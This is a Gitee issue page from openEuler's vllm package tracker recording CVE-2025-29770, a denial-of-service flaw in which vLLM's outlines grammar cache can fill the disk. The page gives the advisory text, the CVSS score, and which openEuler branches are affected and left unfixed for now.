Sign in
Sign up
Explore
Enterprise
Education
Search
Help
Terms of use
About Us
Explore
Enterprise
Education
Gitee Premium
Gitee AI
Sign in
Sign up
Fetch the repository succeeded.
Donate
Please sign in before you donate.
Cancel
Sign in
Scan WeChat QR to Pay
Cancel
Complete
Prompt
Switch to Alipay.
OK
Cancel
Watch
Unwatch
Watching
Releases Only
Ignoring
7
Star
3
Fork
16
src-openEuler
/
vllm
Code
Issues
28
Pull Requests
7
Wiki
Insights
Pipelines
Service
JavaDoc
PHPDoc
Quality Analysis
Jenkins for Gitee
Tencent CloudBase
Tencent Cloud Serverless
悬镜安全
Aliyun SAE
Codeblitz
SBOM
Don’t show this again
Update failed. Please try again later!
Remove this flag
Content Risk Flag
This task is identified by
as the content contains sensitive information such as code security bugs, privacy leaks, etc., so it is only accessible to contributors of this repository.
CVE-2025-29770
已挂起
#IBUSCC
CVE和安全问题
openeuler-ci-bot
owner
Opened this issue
2025-03-20 00:51
一、漏洞信息 漏洞编号:[CVE-2025-29770](https://nvd.nist.gov/vuln/detail/CVE-2025-29770) 漏洞归属组件:[vllm](https://gitee.com/src-openeuler/vllm) 漏洞归属的版本:0.6.6.post1 CVSS V3.0分值: BaseScore:6.5 Medium Vector:CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 漏洞简述: vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0. 漏洞公开时间:2025-03-20 00:15:31 漏洞创建时间:2025-03-20 00:51:48 漏洞详情参考链接: https://nvd.nist.gov/vuln/detail/CVE-2025-29770 <details> <summary>更多参考(点击展开)</summary> | 参考来源 | 参考链接 | 来源链接 | | ------- | -------- | -------- | | security-advisories.github.com | https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py | | | security-advisories.github.com | https://github.com/vllm-project/vllm/pull/14837 | | | security-advisories.github.com | https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8 | | </details> 漏洞分析指导链接: https://gitee.com/openeuler/cve-manager/blob/master/cve-vulner-manager/doc/md/manual.md 漏洞数据来源: openBrain开源漏洞感知系统 漏洞补丁信息: <details> <summary>详情(点击展开)</summary> | 影响的包 | 修复版本 | 修复补丁 | 问题引入补丁 | 来源 | | ------- | -------- | ------- | -------- | --------- | | | | https://github.com/vllm-project/vllm/pull/14837 | | security-advisories.github.com | </details> 二、漏洞分析结构反馈 影响性分析说明: vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0. openEuler评分: 6.5 Vector:CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 受影响版本排查(受影响/不受影响): 1.openEuler-22.03-LTS-SP4(0.6.6.post1):受影响 2.openEuler-24.03-LTS-Next(0.6.6.post1):受影响 3.openEuler-24.03-LTS-SP1(0.6.6.post1):受影响 4.master(0.7.3):不受影响 5.openEuler-20.03-LTS-SP4:不受影响 6.openEuler-22.03-LTS-SP3:不受影响 7.openEuler-24.03-LTS:不受影响 8.openEuler-24.03-LTS-SP2:不受影响 修复是否涉及abi变化(是/否): 1.master(0.7.3):否 2.openEuler-20.03-LTS-SP4:否 3.openEuler-22.03-LTS-SP3:否 4.openEuler-22.03-LTS-SP4(0.6.6.post1):否 5.openEuler-24.03-LTS:否 6.openEuler-24.03-LTS-Next(0.6.6.post1):否 7.openEuler-24.03-LTS-SP1(0.6.6.post1):否 8.openEuler-24.03-LTS-SP2:否 原因说明: 1.openEuler-22.03-LTS-SP4(0.6.6.post1):暂不修复-暂无解决方案或补丁 2.openEuler-24.03-LTS-Next(0.6.6.post1):暂不修复-暂无解决方案或补丁 3.openEuler-24.03-LTS-SP1(0.6.6.post1):暂不修复-暂无解决方案或补丁 4.openEuler-20.03-LTS-SP4:不受影响-组件不存在 5.openEuler-22.03-LTS-SP3:不受影响-组件不存在 6.openEuler-24.03-LTS:不受影响-组件不存在 7.openEuler-24.03-LTS-SP2:不受影响-组件不存在 8.master(0.7.3):不受影响-漏洞代码不在执行路径
一、漏洞信息 漏洞编号:[CVE-2025-29770](https://nvd.nist.gov/vuln/detail/CVE-2025-29770) 漏洞归属组件:[vllm](https://gitee.com/src-openeuler/vllm) 漏洞归属的版本:0.6.6.post1 CVSS V3.0分值: BaseScore:6.5 Medium Vector:CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 漏洞简述: vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0. 漏洞公开时间:2025-03-20 00:15:31 漏洞创建时间:2025-03-20 00:51:48 漏洞详情参考链接: https://nvd.nist.gov/vuln/detail/CVE-2025-29770 <details> <summary>更多参考(点击展开)</summary> | 参考来源 | 参考链接 | 来源链接 | | ------- | -------- | -------- | | security-advisories.github.com | https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py | | | security-advisories.github.com | https://github.com/vllm-project/vllm/pull/14837 | | | security-advisories.github.com | https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8 | | </details> 漏洞分析指导链接: https://gitee.com/openeuler/cve-manager/blob/master/cve-vulner-manager/doc/md/manual.md 漏洞数据来源: openBrain开源漏洞感知系统 漏洞补丁信息: <details> <summary>详情(点击展开)</summary> | 影响的包 | 修复版本 | 修复补丁 | 问题引入补丁 | 来源 | | ------- | -------- | ------- | -------- | --------- | | | | https://github.com/vllm-project/vllm/pull/14837 | | security-advisories.github.com | </details> 二、漏洞分析结构反馈 影响性分析说明: vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0. openEuler评分: 6.5 Vector:CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 受影响版本排查(受影响/不受影响): 1.openEuler-22.03-LTS-SP4(0.6.6.post1):受影响 2.openEuler-24.03-LTS-Next(0.6.6.post1):受影响 3.openEuler-24.03-LTS-SP1(0.6.6.post1):受影响 4.master(0.7.3):不受影响 5.openEuler-20.03-LTS-SP4:不受影响 6.openEuler-22.03-LTS-SP3:不受影响 7.openEuler-24.03-LTS:不受影响 8.openEuler-24.03-LTS-SP2:不受影响 修复是否涉及abi变化(是/否): 1.master(0.7.3):否 2.openEuler-20.03-LTS-SP4:否 3.openEuler-22.03-LTS-SP3:否 4.openEuler-22.03-LTS-SP4(0.6.6.post1):否 5.openEuler-24.03-LTS:否 6.openEuler-24.03-LTS-Next(0.6.6.post1):否 7.openEuler-24.03-LTS-SP1(0.6.6.post1):否 8.openEuler-24.03-LTS-SP2:否 原因说明: 1.openEuler-22.03-LTS-SP4(0.6.6.post1):暂不修复-暂无解决方案或补丁 2.openEuler-24.03-LTS-Next(0.6.6.post1):暂不修复-暂无解决方案或补丁 3.openEuler-24.03-LTS-SP1(0.6.6.post1):暂不修复-暂无解决方案或补丁 4.openEuler-20.03-LTS-SP4:不受影响-组件不存在 5.openEuler-22.03-LTS-SP3:不受影响-组件不存在 6.openEuler-24.03-LTS:不受影响-组件不存在 7.openEuler-24.03-LTS-SP2:不受影响-组件不存在 8.master(0.7.3):不受影响-漏洞代码不在执行路径
Comments (
5
)
Sign in
to comment
Status
已挂起
Backlog
已挂起
Doing
Done
Declined
Assignees
Not set
jimmy_hero
jimmy_hero
Assignee
Collaborator
+Assign
+Mention
Labels
CVE/UNFIXED
sig/ai
Not set
Projects
Unprojected
Unprojected
Milestones
No related milestones
No related milestones
Pull Requests
None yet
None yet
Successfully merging a pull request will close this issue.
Branches
No related branch
Branches (9)
Tags (1)
master
sync-pr26-v0.9.1-to-master
openEuler-24.03-LTS-SP2
openEuler-25.09
openEuler-22.03-LTS-SP4
openEuler-22.03-LTS-Next
openEuler-24.03-LTS-Next
openEuler-24.03-LTS-SP1
openEuler-24.03-LTS-SP3
openEuler-22.03-LTS-SP4-update-20250411
Planed to start   -   Planed to end
-
Top level
Not Top
Top Level: High
Top Level: Medium
Top Level: Low
Priority
Not specified
Serious
Main
Secondary
Unimportant
Duration
(hours)
参与者(1)
1
https://gitee.com/src-openeuler/vllm.git
git@gitee.com:src-openeuler/vllm.git
src-openeuler
vllm
vllm
Going to Help Center
Search
Git 命令在线学习
如何在 Gitee 导入 GitHub 仓库
Git 仓库基础操作
企业版和社区版功能对比
SSH 公钥设置
如何处理代码冲突
仓库体积过大,如何减小?
如何找回被删除的仓库数据
Gitee 产品配额说明
GitHub仓库快速导入Gitee及同步更新
什么是 Release(发行版)
将 PHP 项目自动发布到 packagist.org
Repository Report
Back to the top
Login prompt
This operation requires login to the code cloud account. Please log in before operating.
Go to login
No account. Register